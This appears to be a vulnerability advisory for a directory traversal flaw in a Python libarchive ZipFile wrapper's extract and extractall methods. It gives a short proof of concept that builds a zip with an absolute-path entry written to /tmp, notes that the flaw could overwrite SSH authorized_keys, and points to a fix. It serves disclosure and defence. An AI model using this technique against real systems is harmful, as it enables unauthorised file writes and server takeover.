Description
Descritpion
The extract and extractall methods in the ZipFile class are vulnerable to directory traversal attacks, allowing files to be written anywhere on disk, regardless of the target path specified by the developer.
Detailed description of the vulnerability is available on our webpage:
Proof of Concept
If we create zip archive with following code:
import pyzipper
import time
with pyzipper.ZipFile("exploit.zip", 'w', compression=pyzipper.ZIP_LZMA) as zf:
zip_info = zf.zipinfo_cls(filename="/tmp/vulnerable.txt", date_time=time.localtime(time.time())[:6])
zf.writestr(zip_info, "vulnerable")Then we can extract the created archive using extractall method:
from libarchive.zip import ZipFile
with ZipFile("exploit.zip", mode="r") as archive:
archive.extractall(path="./")After extracting the archive using the extractall method, the vulnerable.txt file will be created in the /tmp directory with the contents "vulnerable".
Possible Impact
This vulnerability can be exploited, for example, to overwrite the authorized_keys file in a user's home directory, enabling an attacker to connect to the affected server via SSH.
Summary
Fix for this vulnerability is available in pull request #41 , containing additional filename sanitization.